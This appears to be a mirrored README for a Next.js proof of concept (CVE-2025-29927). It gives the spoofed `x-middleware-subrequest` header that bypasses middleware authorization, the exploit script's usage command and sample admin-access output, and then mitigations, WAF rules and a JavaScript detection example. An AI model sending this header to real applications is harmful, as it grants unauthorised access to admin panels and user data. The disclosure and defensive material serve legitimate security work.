## https://sploitus.com/exploit?id=D90DED66-9003-5C5A-9610-C236F11D7BE9
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)
This repository contains a Proof of Concept (PoC) exploit for **CVE-2025-29927**, a critical vulnerability in **Next.js** that allows attackers to bypass authorization checks by abusing a middleware-specific HTTP header.
---
## Overview
- **CVE ID:** CVE-2025-29927
- **Severity:** Critical (CVSS 9.1)
- **Affected Framework:** [Next.js](https://nextjs.org/)
- **Vulnerability Type:** Authorization Bypass
- **Exploitation Vector:** HTTP Request Header
- **Exploit Complexity:** Low
- **Authentication Required:** No
---
## About the Vulnerability
Next.js applications often rely on middleware for authorization and access control. This CVE arises from a logic flaw in how the `x-middleware-subrequest` header is processed. When this header is set to `middleware`, the server may incorrectly assume the request originated from internal logic and **bypass middleware-based auth**.
> This can allow attackers to access admin panels, protected APIs, or user data, with **no credentials or valid session.**
---
## PoC Exploit
We provide a simple Python script to test whether a Next.js application is vulnerable.
### Usage
```bash
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
```
## Sample Output
```
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
```
## Dependencies
- Python 3.6+
- requests library
## Mitigation
- Upgrade to the latest patched version of Next.js.
- Avoid using `x-middleware-subrequest` as a trust signal.
- Implement server-side session validation and proper authorization checks in protected routes.
- Consider adding WAF/IDS rules to block or flag suspicious use of this header.
WAF Logic (expressed as Python; adapt to your WAF's rule syntax):
```python
# Block any inbound request whose header carries the value the PoC sends.
if request.headers.get('x-middleware-subrequest') == 'middleware':
    block_request()
```
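The same detection, as an added defensive example that is not part of this PoC repository, written for a Node.js reverse proxy or WAF layer in front of a Next.js app. It assumes `headers` is a plain object with lower-cased names (as `http.IncomingMessage.headers` provides) and generalises the rule above: because `x-middleware-subrequest` is only ever set by Next.js itself for internal sub-requests, any externally supplied value is flagged, not just the exact string `middleware`.

```javascript
// Added example (not the PoC's or Next.js's own code).
// Assumption: `headers` is an object keyed by lower-cased header name.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Inspect one inbound request and return a verdict the caller can act on
// (block, strip, or just log). `trustedInternal` should only be true for
// traffic that provably originated inside the deployment, never for a client.
function inspectRequest(headers, { trustedInternal = false } = {}) {
  const raw = headers[SUBREQUEST_HEADER];
  if (raw === undefined) return { action: 'allow', reason: 'header absent', value: null };
  const value = String(raw);
  if (trustedInternal) return { action: 'allow', reason: 'internal origin', value };
  // The page's rule matches the exact value; the general rule is that no client
  // has a legitimate reason to send this internal-only header at all.
  const exact = value === 'middleware';
  return {
    action: 'block',
    reason: exact
      ? 'external request spoofs internal middleware marker'
      : 'external request carries internal-only header',
    value,
  };
}

// Alternative mitigation: strip the header so the downstream Next.js app never
// sees it. Returns a new headers object; the input is not mutated.
function stripSubrequestHeader(headers) {
  const copy = { ...headers };
  delete copy[SUBREQUEST_HEADER];
  return copy;
}

// One log line per flagged request, suitable for SIEM ingestion.
function logLine(clientIp, path, verdict) {
  return `${verdict.action.toUpperCase()} ip=${clientIp} path=${path} ` +
         `hdr=${SUBREQUEST_HEADER} value=${JSON.stringify(verdict.value)} reason="${verdict.reason}"`;
}

// Constructed sample requests (not real traffic) to show the check in action.
const SAMPLE_REQUESTS = [
  { ip: '203.0.113.5', path: '/admin', headers: { host: 'app.example', 'x-middleware-subrequest': 'middleware' } },
  { ip: '203.0.113.6', path: '/api/users', headers: { host: 'app.example', 'x-middleware-subrequest': 'anything' } },
  { ip: '203.0.113.7', path: '/', headers: { host: 'app.example' } },
];

function runSamples() {
  return SAMPLE_REQUESTS.map((r) => logLine(r.ip, r.path, inspectRequest(r.headers)));
}

module.exports = { inspectRequest, stripSubrequestHeader, logLine, runSamples, SAMPLE_REQUESTS };
```

Running `runSamples()` prints one BLOCK line for each of the first two constructed requests and an ALLOW line for the third.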
## Disclosure & Credits
This PoC was developed by the Offensive Security Team at W2H Corp. as part of our continuous vulnerability research efforts. The original post for the CVE explanation is [here](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware).